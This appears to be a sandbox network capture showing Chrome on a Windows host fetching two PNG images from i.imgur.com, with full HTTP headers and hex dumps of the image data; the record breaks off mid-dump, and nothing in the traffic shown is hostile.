Document===v&&t(v,b)?1:k?I(k,a)-I(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,e=a.parentNode,f=b.parentNode,g=[a],h=[b];if(!e\|\|!f)return a===n?-1:b===n?1:e?-1:f?1:k?I(k,a)-I(k,b):0;if(e===f)return la(a,b);c=a;while(c=c.parentNode)g.un

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.16	49718	151.101.44.193	443	7116	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 18:07:30 UTC	587	OUT	GET /0HdPsKK.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 18:07:30 UTC	761	IN	HTTP/1.1 200 OK Connection: close Content-Length: 5579 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 02:14:56 GMT ETag: "28a8812c3aaf8af83ba5c83c58750528" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: YYTlmwzZRLqXoGXppDaHC3Gtdw92u8SHfCwF9eVUy31VA6g75HGzNw== cache-control: public, max-age=31536000 Accept-Ranges: bytes Age: 804560 Date: Thu, 27 Mar 2025 18:07:30 GMT X-Served-By: cache-iad-kiad7000021-IAD, cache-nyc-kteb1890035-NYC X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 1295, 0 X-Timer: S1743098850.189234,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 00 55 08 06 00 00 00 a6 46 3a 96 00 00 15 92 49 44 41 54 78 9c ec 9d 0b 94 5b 55 bd ff bf bf 73 92 4c 87 4e 0b 14 da 22 85 ce b4 50 40 d4 5a 44 84 76 48 ce 49 67 0a 88 2f a4 88 8a 02 ca fa 03 fe 51 c1 85 02 2e 04 9a b2 00 29 78 e1 e2 c5 07 57 91 87 d6 8b 08 f5 a2 82 80 b4 d9 c9 cc 14 aa 94 87 0f b4 0a a5 14 4a 6b a9 d4 76 66 3a d3 49 72 7e 77 9d 24 33 ce 24 fb 24 27 cf 33 e9 ec cf 5a b3 26 d9 cf ef 49 b2 7f fb bd b7 0f 0a c5 04 a1 ef c6 39 33 91 e4 d3 99 71 1a 33 e6 10 61 0a c0 53 19 98 4a a0 96 7f 87 e4 1d 0c fc 8e 40 bf d7 60 3d 9b 0a a4 9e 9e 7a f5 96 7f 7a a9 bd 56 90 d7 02 14 8a 5a 32 70 c3 9c d6 64 d2 ba 08 a0 0f 01 78 6f 05 49 fd 01 b0 1e 06 f0 d0 94 c8 e6 97 aa 28 d1 53 94 01 50 ec Data Ascii: PNGIHDRUF:IDATx[UsLN"P@ZDvHIg/Q.)xWJkvf:Ir~w$3$$'3Z&I93q3aSJ@`=zzVZ2pdxoI(SP
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: 34 f9 e0 31 ce b4 df 3b 6a 97 27 e1 a4 a1 ff 35 22 40 ec ba e2 41 15 0a 17 ec 5e d6 7a 35 11 be 61 ff 74 bd d6 d2 28 d0 7e 07 a2 f9 bc 95 d0 66 4a 06 e8 53 7b 91 78 ec 4c 20 59 bb 9b c3 fc 9c 3c 82 96 76 6f 2c 14 46 b5 00 14 05 e9 bd be cd 80 85 fb 01 cc f6 5a 4b 23 a1 1d 7c 04 9a 3f 7b 1f 68 ff 59 f2 00 7a 13 f4 a3 3e 8d d4 4b 77 d7 4c c3 10 e9 37 03 38 bb 50 18 35 08 a8 70 a4 2f d2 7a 0e 2c 7e 4a 15 fe d2 f0 7f e0 3c ec 77 f1 a3 ce 85 3f 0b cd fb 24 68 c6 09 35 d3 41 8c a5 fc ab c5 05 45 28 03 a0 90 b2 3b d2 b6 82 41 2b 01 52 ad 44 17 50 cb 74 f8 17 5d 84 c9 5f 5e 83 a6 0f 2e 07 7c 4d c5 e3 68 7e f8 da 6f 81 36 e7 63 35 12 45 5a 22 91 ba bc 60 90 da e4 ac 68 64 fa 96 b7 5d c6 8c ff f4 5a 47 4d b0 0b a6 a6 03 a4 a7 2f 1a a2 e1 d7 9a 96 fd 6f bf d7 d2 ff Data Ascii: 41;j'5"@A^z5at(~fJS{xL Y<vo,FZK#\|?{hYz>KwL78P5p/z,~J<w?$h5AE(;A+RDPt]_^.\|Mh~o6c5EZ"`hd]ZGM/o
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: fa a6 69 7e 4b 08 51 93 93 32 42 a1 d0 22 22 ac c8 3d fc 9a 08 f6 e7 54 b6 01 20 c2 25 00 bd ab 48 98 31 0d 6c c3 30 77 12 e1 16 21 c4 cd 2e b3 69 a9 e4 fb 20 42 3f 80 3c 03 60 18 e1 eb 00 1c d1 dc dc bc 33 1c 0e ff 66 4c 17 20 14 0a cd 63 a6 f5 44 da 2d 00 1d 50 3c 13 5a a2 69 78 c4 34 cd 7b ca 15 5a 6d 4c d3 bc 9d 48 8b 3b 15 fe b1 d0 c1 00 dd 69 9a e1 67 82 c1 60 0d 2f 6c af 17 e9 e7 f9 8c a6 f1 6a c3 30 9f ec e8 e8 70 bc 12 6a 22 a0 69 da 97 e5 3e 74 b0 69 9a e7 d7 53 0b 11 1d 08 d0 37 0d 23 1c eb ec ec dc bf 9e 79 0f 63 18 c6 12 66 7a 06 e0 29 cc 34 c3 6e dd 8f 18 80 70 38 7c 3c 91 b6 9e 08 c7 96 9e 34 7d ce 30 c2 45 b7 3e 31 53 4d ef 21 30 4d f3 71 80 be 52 46 d4 13 75 5d 7f 6e f1 e2 c5 ad c5 02 32 b3 f4 19 9c dc 8b f9 d5 0a db 38 a7 52 a9 67 3b 3a Data Ascii: i~KQ2B""=T %H1l0w!.i B?<`3fL cD-P<Zix4{ZmLH;ig`/lj0pj"i>tiS7#ycfz)4np8\|<4}0E>1SM!0MqRFu]n28Rg;:
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: e9 af 37 3e 22 6c 01 c6 4e 01 12 e1 7d c1 60 70 7a 57 57 97 b4 70 95 0b 33 51 0d 96 02 49 8f 5e 65 e6 25 00 d6 15 8a 18 0c 06 df 41 44 ef c9 75 27 42 a1 2f c7 69 d9 aa a3 c1 91 75 b3 b2 1a 77 15 d2 e7 44 21 63 e3 34 b7 cd 4c af 95 93 97 3b 3d e3 63 11 10 91 f6 c5 5c 37 66 fc c1 b2 ac 79 a6 69 ce cb 3a 49 47 fc 75 5d bf 14 40 91 be 75 35 e0 fb 84 10 05 c7 d7 90 5d 08 a4 eb d2 ad 3a 1b 8a 4f b9 f2 a0 5b 35 3e 66 ea 22 c2 82 5c 0f 5d d7 bf 0a c0 51 a8 69 9a 2d cc f8 1b 51 7e 6b 61 60 60 cf fe eb d6 ad ab d7 65 68 4f c9 9d e9 0b ed ed ed 77 f4 f4 f4 f4 3a 45 d4 75 5d ba 70 89 d9 f9 98 6c 22 da 29 5f ce a4 1d 59 40 e3 09 32 47 cb b2 a4 f7 b5 55 06 fd 87 dc dd 72 f8 9c 8a e1 66 1d 00 ff a3 bc b4 ab 47 38 1c 5e ca 8c 59 b9 ee 44 98 0f 50 b4 78 0a 74 7e 47 47 c7 Data Ascii: 7>"lN}`pzWWp3QI^e%ADu'B/iuwD!c4L;=c\7fyi:IGu]@u5]:O[5>f"\]Qi-Q~ka``ehOw:Eu]pl")_Y@2GUrfG8^YDPxt~GG
2025-03-27 18:07:30 UTC	95	IN	Data Raw: 4b b7 97 77 74 74 cc 4c a5 52 3f c9 f7 e1 bc 01 38 19 42 88 87 4c d3 8c e4 0f 6c 51 c1 c1 59 66 7c 57 72 26 a0 54 63 2c 16 5d 66 9a 66 22 b7 ac 11 01 93 26 4d 3a 56 b6 79 0b 99 59 80 de 0a 3e af 51 69 14 e6 ff 02 00 00 ff ff 5a 98 a3 a9 0f 7b c2 43 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: KwttLR?8BLlQYf\|Wr&Tc,]ff"&M:VyY>QiZ{CIENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.16	49719	151.101.44.193	443	7116	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 18:07:30 UTC	587	OUT	GET /KAb5SEy.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 18:07:30 UTC	761	IN	HTTP/1.1 200 OK Connection: close Content-Length: 48869 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 13:35:05 GMT ETag: "8aa14660517f5460156fccc2199cf83c" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: ZMDtIIYNSizYrfDVWXb5ZuJtkSbNLszxoUAHUCL9zZz9IlMMufkJOg== cache-control: public, max-age=31536000 Accept-Ranges: bytes Age: 2850922 Date: Thu, 27 Mar 2025 18:07:30 GMT X-Served-By: cache-iad-kjyo7100129-IAD, cache-nyc-kteb1890088-NYC X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 13, 0 X-Timer: S1743098850.195333,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 a7 00 00 02 3e 08 02 00 00 00 0e ee 34 d8 00 00 80 00 49 44 41 54 78 9c ec bd 77 7c 14 e5 da ff bf b3 b3 7d 37 3d 10 0c 3d 94 50 42 11 54 10 8f 22 d6 a3 1e 45 e4 b1 60 45 54 1e 11 45 ba 22 52 45 a4 89 05 eb 51 44 fd 3e 3e a8 14 c1 47 39 08 7a 10 14 50 94 5e 12 6a 28 21 04 48 48 48 d9 36 ed f7 3a 5c fe 6e c7 94 d9 cd 92 9d 6c 76 3f ef 3f 7c 6d 76 67 97 7b dc d9 f9 dc f7 75 5f 9f eb 32 29 8a 62 00 00 00 00 40 0c 60 ac ef 01 00 00 00 00 40 27 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 01 aa 0f 00 00 00 c4 0a 50 7d 00 00 00 20 56 80 ea 03 00 00 00 b1 02 54 1f 00 00 00 88 15 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 Data Ascii: PNGIHDR>4IDATxw\|}7==PBT"E`ETE"REQD>>G9zP^j(!HHH6:\nlv??\|mvg{u_2)b@`@'@b>+@XP} VT@b>+@X
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: 95 de 05 00 00 20 34 f8 a9 53 a7 d6 f7 18 40 1d 50 a9 2c 2e 7b 92 64 d8 ef f7 7f f0 c1 07 6f bf fd f6 91 23 47 2e fe df a2 cf ac a9 05 1f 1d 40 35 79 68 f6 c0 f3 bc c5 62 a9 6d 96 80 d9 6c 16 45 f1 d4 a9 53 1e 8f 27 23 23 23 35 35 d5 68 34 92 2b e1 e2 4f 01 00 00 62 13 44 f8 1b 3c b4 94 67 02 4c 79 fb a4 8e 24 90 a2 28 2e 58 b0 60 ee dc b9 a7 4e 9d ba 98 7f a8 da 9d 7e b5 47 40 7d 24 2b d3 1b f2 05 46 19 00 b4 0b f0 d8 63 8f 8d 1f 3f 1e 8e 3e 00 00 b8 48 a0 fa 51 8e db ed 9e 33 67 ce 82 05 0b ce 9d 3b 47 4b f0 da c6 c9 d5 95 74 6b 82 2d fd 69 7b be ea 4b 3c cf 57 7a 3e 18 58 8e a1 cd 66 7b e0 81 07 46 8e 1c 99 95 95 55 db 0f 01 00 00 c0 40 84 3f 4a 10 04 81 a5 eb b3 75 7f 41 41 c1 dc b9 73 17 2c 58 50 52 52 62 32 99 ec 76 bb cf e7 ab ed 27 b3 d5 3c fd 49 Data Ascii: 4S@P,.{do#G.@5yhbmlES'###55h4+ObD<gLy$(.X`N~G@}$+Fc?>HQ3g;GKtk-i{K<Wz>Xf{FU@?JuAAs,XPRRb2v'<I
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: 15 15 15 4c ec 03 a6 22 32 1f 3f 1d 4c 66 01 83 c1 30 7a f4 e8 f1 e3 c7 a7 a5 a5 85 6f c0 00 00 d0 a0 81 ea 47 1c 14 ee 0e 78 d8 a2 45 8b c6 8c 19 53 5c 5c 1c c2 3f c1 8a dd 5a ad 56 9f cf c7 71 5c db b6 6d 37 6e dc 18 17 17 67 b3 d9 2a 25 de 87 1b 51 14 1f 79 e4 91 ff fd df ff 25 39 3f 7f fe 7c b5 c2 1f 8c 8f df 6c 36 0f 1c 38 70 da b4 69 e4 33 84 9d 0f 00 00 2a 81 08 7f c4 11 8c dc 2e 5c b8 70 fa f4 e9 05 05 05 54 0a b7 b6 9f 4f 85 71 52 52 52 68 b9 7c e7 9d 77 fe f3 9f ff 6c d2 a4 09 49 be 7a 27 5e dd cb 27 4c 18 8d c6 56 ad 5a 71 1c 97 9d 9d 5d 5e 5e 6e b5 5a 5d 2e 97 db ed b6 58 2c ea 7f 9d 02 fb 26 93 a9 a6 3a 04 e4 e3 3f 79 f2 a4 ba 1f 3f 6b 4a 04 00 00 00 aa df 90 20 09 14 45 f1 bd f7 de 9b 3c 79 72 7e 7e be d9 6c 0e c1 94 4f da 69 b3 d9 4a 4b 4b Data Ascii: L"2?Lf0zoGxES\\?ZVq\m7ng%Qy%9?\|l68pi3.\pTOqRRRh\|wlIz'^'LVZq]^^nZ].X,&:?y?kJ E<yr~~lOiJKK
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: ab 55 c7 53 a9 4b a8 83 0e f9 f8 3d 1e cf d1 a3 47 7d 3e 1f 2d f4 59 25 c1 9a 36 f5 69 cb 9f 22 25 54 9e 48 14 45 af d7 0b 1f 3f 00 20 36 81 73 2f 52 c8 cb cb 9b 32 65 ca 47 1f 7d 44 5e 3b e1 02 06 83 21 2e 2e 4e 14 45 ed 7d 7d 52 7d 52 3e 2a 64 6b 36 9b 37 6e dc d8 b5 6b 57 1d cf 40 0f 3c 1e cf 8d 37 de b8 7d fb 76 b7 db cd f3 3c c9 79 40 1f bf c3 e1 50 14 85 fe 1f da 6c 36 56 d9 10 3e 7e 00 40 ac d1 90 12 bb 1a 28 1a cb 50 b6 7c cf ce ce 1e 39 72 e4 a2 45 8b e8 4f b7 db cd 5e 2a 2b 2b 23 b9 aa 94 9f cf 48 48 48 20 f7 5a 7c 7c 3c 6d ed f7 ee dd fb b7 df 7e 8b 3e c9 a7 3a 45 1b 36 6c e8 df bf 3f ed 59 24 24 24 50 be 82 c5 62 a9 94 a5 68 34 1a d9 8e 86 db ed 66 d3 26 af d7 cb be 91 05 0b 16 8c 1e 3d fa d0 a1 43 f4 67 08 e5 8d 01 00 a0 61 81 08 7f d8 d1 b0 Data Ascii: USK=G}>-Y%6i"%THE? 6s/R2eG}D^;!..NE}}R}R>dk67nkW@<7}v<y@Pl6V>~@(P\|9rEO^++#HHH Z\|\|<m~>:E6l?Y$$$Pbh4f&=Cga
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: de 7d fb f6 29 8a 02 1f 3f 00 a0 a1 03 bf 7e 18 f9 f5 d7 5f 6f bf fd f6 b3 67 cf 5a 2c 16 5a af d3 da 5d 92 24 9b cd a6 b1 bb cf 1c e7 f4 20 21 21 a1 57 af 5e 2b 57 ae b4 d9 6c fa 9e 41 83 27 64 1f bf 24 49 34 45 a3 5a fd 34 f7 1a 37 6e dc d8 b1 63 d5 7b fc 55 d3 36 01 00 20 92 81 25 a9 8e 61 8b f8 8d 1b 37 0e 1b 36 ec ec d9 b3 a4 3d 34 bb 12 45 91 84 87 49 3e 2b a7 4f e9 7b 1c c7 31 3b 7e 42 42 02 3d b8 f3 ce 3b 21 f9 a1 51 93 8f 9f 59 f6 09 da 55 61 fa 5d 5e 5e ce ea 28 78 3c 1e f6 9d be f6 da 6b 23 47 8e 3c 72 e4 08 fd 29 08 02 24 1f 00 d0 b0 40 84 bf 2e 51 14 85 dc f6 bb 76 ed 9a 31 63 c6 fa f5 eb 2d 16 8b 76 8d 17 16 6b 61 f6 3c 2a ba 27 cb b2 c7 e3 31 9b cd 4f 3e f9 e4 c8 91 23 11 58 0e 19 f2 f1 cb b2 bc 77 ef 5e b7 db 6d b7 db 5d 2e 97 db ed 66 33 Data Ascii: })?~_ogZ,Z]$ !!W^+WlA'd$I4EZ47nc{U6 %a76=4EI>+O{1;~BB=;!QYUa]^^(x<k#G<r)$@.Qv1c-vka<*'1O>#Xw^m].f3
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: 7e f8 e1 a1 87 1e ca cb cb a3 4b ba ac ac 4c 96 65 9e e7 99 c3 48 92 24 9f cf 47 9e 94 a2 a2 a2 23 47 8e dc 73 cf 3d f5 3d 70 10 5e a0 fa a1 40 92 ff eb af bf 4e 99 32 e5 f0 e1 c3 d4 2f a7 b6 6e 08 12 92 c7 1e 7b 6c c6 8c 19 b4 59 00 c9 d7 19 b5 8f bf 7b f7 ee 65 65 65 db b7 6f af ad 8f df 64 32 09 82 a0 f6 f1 53 3f 7e f8 f8 41 fd b2 7c f9 f2 91 23 47 16 14 14 50 6b 69 ba e1 a8 a7 b0 74 db 61 7d a4 14 45 39 78 f0 e0 ed b7 df de a4 49 93 7a 1d 38 08 2f 50 fd 5a 43 e1 fd a2 a2 a2 59 b3 66 ad 5e bd 3a 98 ce ad d5 62 b1 58 ee bd f7 de 09 13 26 20 1a 5c bf d0 8e 7e 72 72 72 68 3e 7e 93 c9 44 0d 96 d4 3e fe 9c 9c 1c ea c7 0f 1f 3f d0 1f bf df bf 6c d9 b2 b9 73 e7 ee dd bb 97 d5 0e b1 58 2c 0e 87 83 1e 3b 9d 4e 8a 35 92 9f 85 2e 60 45 51 44 51 6c d4 a8 51 bf 7e Data Ascii: ~KLeH$G#Gs==p^@N2/n{lY{eeeod2S?~A\|#GPkita}E9xIz8/PZCYf^:bX& \~rrrh>~D>?lsX,;N5.`EQDQlQ~
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: 6a fd e6 9b 6f d8 ce 3d 68 88 f8 fd 7e 56 a2 3c 21 21 81 1e b0 0a 3f 44 25 1f bf 06 c3 86 0d a3 8f ad a8 a8 a8 ef 33 03 0d 92 a5 4b 97 a6 a7 a7 53 05 1e 8d 2b 8d 5d a2 64 3d 65 8f 0d 06 43 62 62 22 bd da ae 5d bb e5 cb 97 d7 f7 09 01 9d 40 84 3f 00 54 63 67 e5 ca 95 9f 7f fe 39 f9 f4 6a 82 b5 cd 65 6d 2d 98 cb 6b e4 c8 91 0f 3f fc b0 d5 6a 85 71 ab e1 c2 f3 7c cb 96 2d 65 59 56 f7 e3 77 bb dd b5 ed c7 4f 1c 3b 76 4c 92 a4 bf fd ed 6f b4 4f 84 fd 1d 50 2b 96 2e 5d 3a 6d da b4 c3 87 0f 07 ac f3 a1 76 99 b2 c7 1c c7 c5 c7 c7 9f 3f 7f 5e 96 e5 ac ac ac d1 a3 47 df 7d f7 dd b8 08 63 85 fa 9e 76 44 34 1e 8f 47 51 94 bc bc bc 9b 6f be 99 fe 77 69 af f5 69 e2 4c 3d 57 d8 cc ba 53 a7 4e c7 8e 1d ab ef 53 01 75 c3 a1 43 87 fe eb bf fe 8b be 6e 5a 63 31 81 57 5f 1b Data Ascii: jo=h~V<!!?D%3KS+]d=eCbb"]@?Tcg9jem-k?jq\|-eYVwO;vLoOP+.]:mv?^G}cvD4GQowiiL=WSNSuCnZc1W_
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: be 42 20 a1 3a 36 81 2f 1f 84 15 a8 fe 5f a0 9b f5 d9 b3 67 3f f9 e4 13 ba e7 32 87 2b 9b 44 6b 7f c2 ed b7 df 7e fd f5 d7 ab df 08 a2 1e ea 9a 68 30 18 2e bd f4 d2 71 e3 c6 5d 77 dd 75 21 7c 88 d9 6c ce cb cb 5b b7 6e 5d 18 06 08 1a 12 a1 f5 cb 57 d7 d8 67 21 81 b4 b4 b4 99 33 67 3e f8 e0 83 f4 a7 28 8a 54 6d 0c 61 a4 58 06 aa ff 17 28 b8 fa d5 57 5f 9d 3c 79 92 04 5e dd 4f 5d bb 59 b5 28 8a 8d 1a 35 7a f0 c1 07 69 4a ae ee a3 0f a2 1b 8e e3 58 06 f5 35 d7 5c f3 d0 43 0f a5 a4 a4 d4 f6 43 28 ee fa d5 57 5f 51 55 47 10 83 c0 97 0f 74 00 aa ff 27 14 d2 17 45 71 e5 ca 95 ec c7 43 6d 2a 58 b1 55 ed 39 72 87 0e 1d ae bd f6 5a 0a a3 e9 38 70 50 9f b0 4b 42 10 04 7a 7c d7 5d 77 3d fc f0 c3 b5 fd 1c 59 96 39 8e db b0 61 03 25 6c 83 18 04 be 7c a0 03 50 fd 3f a1 Data Ascii: B :6/_g?2+Dk~h0.q]wu!\|l[n]Wg!3g>(TmaX(W_<y^O]Y(5ziJX5\CC(W_QUGt'EqCm*XU9rZ8pPKBz\|]w=Y9a%l\|P?
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: d0 a0 81 03 07 d2 f3 f0 e5 83 d0 80 ea 1b 28 81 bf 56 de 2a fa 8d 25 24 24 b4 6d db 56 97 01 82 86 8a cf e7 a3 1b 7d 90 f7 65 3a 8c f6 71 c3 3f 3a 10 5e c8 97 bf 7f ff fe b8 b8 38 ca c2 a3 1a ba e4 cb b7 5a ad 54 e6 ab 26 e8 56 c3 56 f9 83 06 0d 1a 3e 7c 38 7b 95 f9 f2 65 59 46 f3 5c 10 3c b8 b3 18 dc 6e 37 f5 d9 a3 1b 6e c0 58 19 a5 ee 1b 0c 86 e1 c3 87 23 b0 06 b4 d9 bb 77 2f b3 60 49 92 a4 a1 e5 14 ec 95 24 89 dc 59 8d 1b 37 d6 77 a4 a1 a0 2d 5a 31 0e f5 cb df bf 7f bf c3 e1 20 c9 af b6 5f 3e 05 17 ab 9d ea c5 c5 c5 91 ea b7 6f df fe bd f7 de 53 4b 3e 03 fd f2 41 6d c1 5a df 70 e8 d0 21 8a b6 a9 db ea 68 37 e0 a1 fb 78 46 46 06 02 6b 40 9b 9c 9c 1c 75 8a b5 46 e5 47 36 83 54 14 25 35 35 55 c7 31 d6 1a 3a 05 ab d5 4a b9 e8 f9 f9 f9 a7 4f 9f 3e 7e fc b8 Data Ascii: (V*%$$mV}e:q?:^8ZT&VV>\|8{eYF\<n7nX#w/`I$Y7w-Z1 _>oSK>AmZp!h7xFFk@uFG6T%55U1:JO>~
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: fa 6a ba ef 87 61 74 b5 a3 ea 52 9e 54 9f e7 79 a3 d1 58 ab 8e c0 91 70 3a 75 88 20 08 6b d7 ae 7d e6 99 67 76 ef de 5d c9 97 af fd 46 b5 2f 9f 24 5f 51 94 aa be 7c 48 3e 08 2b 31 ad fa 05 05 05 da 5b 71 d5 92 96 96 96 98 98 18 9e 11 81 06 cc f6 ed db 47 8d 1a f5 d3 4f 3f 71 1c 17 da ea f6 96 5b 6e c9 cc cc 0c c3 d0 ea 0c 2a bb 4b 45 87 aa 0d 59 57 4b 30 db ff 0d 08 f8 f2 41 83 26 a6 27 95 05 05 05 21 dc 8f d0 5d 17 54 65 d7 ae 5d 2f bf fc f2 f7 df 7f 4f 2d 98 43 88 21 b5 6e dd fa 9e 7b ee 21 d9 88 cc d5 5e a5 08 7f 90 92 1f 4d 84 a3 5f fe 5d 77 dd 45 cf c3 97 0f f4 21 76 af 2d 49 92 42 b8 35 1b 0c 86 66 cd 9a 85 61 38 a0 01 93 97 97 37 65 ca 94 65 cb 96 51 f0 b6 a4 a4 24 84 e2 f3 dd ba 75 23 47 a8 76 ad fe fa 85 75 ac a8 94 8b ae 31 4d 89 26 cf 1e 7c f9 Data Ascii: jatRTyXp:u k}gv]F/$_Q\|H>+1[qGO?q[n*KEYWK0A&'!]Te]/O-C!n{!^M_]wE!v-IB5fa87eeQ$u#Gvu1M&\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.16	49722	151.101.44.193	443	7116	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 18:07:30 UTC	386	OUT	GET /0HdPsKK.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 18:07:30 UTC	761	IN	HTTP/1.1 200 OK Connection: close Content-Length: 5579 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 02:14:56 GMT ETag: "28a8812c3aaf8af83ba5c83c58750528" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: YYTlmwzZRLqXoGXppDaHC3Gtdw92u8SHfCwF9eVUy31VA6g75HGzNw== cache-control: public, max-age=31536000 Accept-Ranges: bytes Date: Thu, 27 Mar 2025 18:07:30 GMT Age: 804560 X-Served-By: cache-iad-kiad7000021-IAD, cache-nyc-kteb1890021-NYC X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 1295, 1 X-Timer: S1743098851.649271,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 00 55 08 06 00 00 00 a6 46 3a 96 00 00 15 92 49 44 41 54 78 9c ec 9d 0b 94 5b 55 bd ff bf bf 73 92 4c 87 4e 0b 14 da 22 85 ce b4 50 40 d4 5a 44 84 76 48 ce 49 67 0a 88 2f a4 88 8a 02 ca fa 03 fe 51 c1 85 02 2e 04 9a b2 00 29 78 e1 e2 c5 07 57 91 87 d6 8b 08 f5 a2 82 80 b4 d9 c9 cc 14 aa 94 87 0f b4 0a a5 14 4a 6b a9 d4 76 66 3a d3 49 72 7e 77 9d 24 33 ce 24 fb 24 27 cf 33 e9 ec cf 5a b3 26 d9 cf ef 49 b2 7f fb bd b7 0f 0a c5 04 a1 ef c6 39 33 91 e4 d3 99 71 1a 33 e6 10 61 0a c0 53 19 98 4a a0 96 7f 87 e4 1d 0c fc 8e 40 bf d7 60 3d 9b 0a a4 9e 9e 7a f5 96 7f 7a a9 bd 56 90 d7 02 14 8a 5a 32 70 c3 9c d6 64 d2 ba 08 a0 0f 01 78 6f 05 49 fd 01 b0 1e 06 f0 d0 94 c8 e6 97 aa 28 d1 53 94 01 50 ec Data Ascii: PNGIHDRUF:IDATx[UsLN"P@ZDvHIg/Q.)xWJkvf:Ir~w$3$$'3Z&I93q3aSJ@`=zzVZ2pdxoI(SP
2025-03-27 18:07:30 UTC	1371	IN	Data Raw: 34 f9 e0 31 ce b4 df 3b 6a 97 27 e1 a4 a1 ff 35 22 40 ec ba e2 41 15 0a 17 ec 5e d6 7a 35 11 be 61 ff 74 bd d6 d2 28 d0 7e 07 a2 f9 bc 95 d0 66 4a 06 e8 53 7b 91 78 ec 4c 20 59 bb 9b c3 fc 9c 3c 82 96 76 6f 2c 14 46 b5 00 14 05 e9 bd be cd 80 85 fb 01 cc f6 5a 4b 23 a1 1d 7c 04 9a 3f 7b 1f 68 ff 59 f2 00 7a 13 f4 a3 3e 8d d4 4b 77 d7 4c c3 10 e9 37 03 38 bb 50 18 35 08 a8 70 a4 2f d2 7a 0e 2c 7e 4a 15 fe d2 f0 7f e0 3c ec 77 f1 a3 ce 85 3f 0b cd fb 24 68 c6 09 35 d3 41 8c a5 fc ab c5 05 45 28 03 a0 90 b2 3b d2 b6 82 41 2b 01 52 ad 44 17 50 cb 74 f8 17 5d 84 c9 5f 5e 83 a6 0f 2e 07 7c 4d c5 e3 68 7e f8 da 6f 81 36 e7 63 35 12 45 5a 22 91 ba bc 60 90 da e4 ac 68 64 fa 96 b7 5d 